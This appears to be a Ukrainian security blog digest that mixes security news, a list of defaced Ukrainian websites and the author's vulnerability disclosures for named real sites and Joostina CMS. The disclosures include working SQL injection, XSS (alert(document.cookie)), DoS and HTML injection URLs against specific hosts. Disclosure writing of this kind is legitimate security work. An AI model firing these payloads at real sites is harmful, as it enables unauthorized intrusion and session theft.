Websecurity - Веб безпека

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, виявлена небезпечна вразливість в PHP.

Нещодавно стало відомо про наявність уразливості в PHP 5.2.x і 5.3.x, яка здатна спожити всі доступні ресурси процесора в системі.

За повідомленням news.techlabs.by, WebMoney не працюють через атаку хакерів.

На початку грудня з’явилися повідомлення про проблеми із сервісом light.webmoney.ru. Він зустрічав користувачів, що прийшли сюди за грошима, повідомленням про недоступність сервера. Схоже, що труднощі були серйозні, тому що сервіс не працював декілька діб.

За повідомленням ain.ua, Президент ліквідує комісію з моралі.

Президент Віктор Янукович у рамках адміністративної реформи видав указ “Про оптимізацію системи центральних органів виконавчої влади”, що, зокрема, передбачає ліквідацію Національної експертної комісії з питань захисту суспільної моралі.

Враховуючи дірявість сайту комісії по захисту моралі (що старого, що нового), то це цілком очікуване рішення . Презеденту в рамках адміністративної реформи потрібно ліквідувати всі держоргани, що мають діряві сайти (або поставити питання “ребром”, щоб швидко свої дірки повиправляли). Що значно оптимізує державний апарат і значно заощадить бюджетні кошти.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://refsmarket.com.ua (хакером jake0151) - 06.01.2011 сайт спочатку був похаканий jake0151, а потім AGENT BG4
• http://e-zarina.com.ua (хакером tehlike80) - 02.01.2011, зараз сайт вже виправлений адмінами
• http://ecodah.com.ua (хакерами з RKH aka Republic of Kosovo Hackers) - причому спочатку сайт був взломаний 10.12.2010 RKH, а зараз взломаний AHS-Hackerz. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://ibrain.com.ua (хакером GHoST61) - 11.12.2010, зараз сайт вже виправлений адмінами
• http://fastrackids.com.ua (хакером GHoST61) - 15.12.2010, зараз сайт вже виправлений адмінами

Зазначу, що в 2008 році fastrackids.com.ua вже взламували.

24.05.2010

У жовтні, 22.10.2009, я знайшов Cross-Site Scripting уразливість на сайті http://kpi-telecom.kpi.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.01.2011

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.

Виявленнні численні уразливості безпеки в багатьох браузерах. Зокрема уразливості виявлені в Internet Explorer, WebKit браузерах, Mozilla Firefox та Opera.

За допомогою фьюзера cross_fuzz було виявлено біля сотні різних уразливостей, переважно пов’язаних з пошкодженням динамічної пам’яті. Даний додаток був розроблений Michal Zalewski.

• Announcing cross_fuzz, a potential 0-day in circulation, and more (деталі)

20.05.2010

У жовтні, 21.10.2009, а також додатково сьогодні, я знайшов Denial of Service, Full path disclosure, SQL Injection та Cross-Site Scripting уразливості на проекті http://filestore.com.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на filestore.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

07.01.2011

DoS:

http://filestore.com.ua/search.php?search=%25%25%25&sort=downloadsdesc&type=filename

Full path disclosure:

http://filestore.com.ua/search.php?search=1&type=’

http://filestore.com.ua/search.php?search=1&sort=’

SQL Injection:

http://filestore.com.ua/search.php?search=1&sort=downloadsdesc&type='%20or%201='1
http://filestore.com.ua/search.php?search=1&sort='%20or%201='1&type=filename

XSS:

http://filestore.com.ua/search.php?search=1&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&type=filename
http://filestore.com.ua/search.php?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=downloadsdesc&type=filename
http://filestore.com.ua/login.php?act=getpass&user=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://filestore.com.ua/login.php?act=getpass&email=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені.

Поздоровляю вас з Різдвом Христовим!

У зв’язку з Новим Роком та Різдвом пропоную вам подивитися мою святкову листівку на флеші. Це нова листівка на англійській мові, на українській мові можете подивитися попередню листівку.

Бажаю вам всього найкращого .

Сьогодні я знайшов Cross-Site Scripting уразливість в системі Joostina. Joostina CMS - це різновид Joomla. Про що найближчим часом повідомлю розробникам.

Уразливість, як і в попередньому випадку, виявив на секюріті сайті http://ufsb.kiev.ua, де використовується даний движок. Адміни якого, як і раніше, не слідкують за безпекою свого сайта.

Раніше я вже писав про уразливість в Joostina.

Дана уразливість подібна до Cross Site Scripting уразливості в Joomla! 1.0.x . Що нещодавно була виявлена та оприлюднена Aung Khant.

XSS (з MouseOverJacking):

http://site/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22

XSS на http://ufsb.kiev.ua:

• alert(document.cookie)
• цікавий

Уразливі Joostina 1.3.0 та попередні версії.

В даній добірці уразливості в веб додатках:

• Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability (деталі)
• PoC for ZDI-10-078 (Novell ZENworks) (деталі)
• SQL injection vulnerability in CompuCMS (деталі)
• XSS vulnerability in TCMS (деталі)
• NovaStor NovaNet <= 13.0 issues (деталі)
• SQL injection vulnerability in CompuCMS (деталі)
• BugTracker.net 3.4.3 SQL Injection (деталі)
• Vulnerability in GnuTLS (деталі)
• New phpmyadmin packages fix several vulnerabilities (деталі)
• New typo3-src packages fix several vulnerabilities (деталі)

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Цього разу статті на тему безпеки онлайнових електронних транзакцій.

Добірка цікавого чтива на тему безпеки, в тому числі web security (статті з Вікіпедії):

• 3-D Secure
• Secure Electronic Transaction
• Transport Layer Security (TLS та SSL)
• Card security code
• Man-in-the-middle attack

18.05.2010

У жовтні, 17.10.2009, я знайшов HTML Injection уразливість на проекті http://cripo.com.ua (онлайн ЗМІ, що також пише на тему безпеки). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

06.01.2011

XSS:

http://cripo.com.ua/?q=%3Cxss%3E

На сайті потенційно була можлива і XSS, при обході ModSecurity.

HTML Injection:

http://cripo.com.ua/?q=%3Ch1%3EHacked

Зараз дана уразливість виправлена шляхом посилення фільтрації. Але виправлена неякісно і атаки все ще можливі.

HTML Injection:

• html включення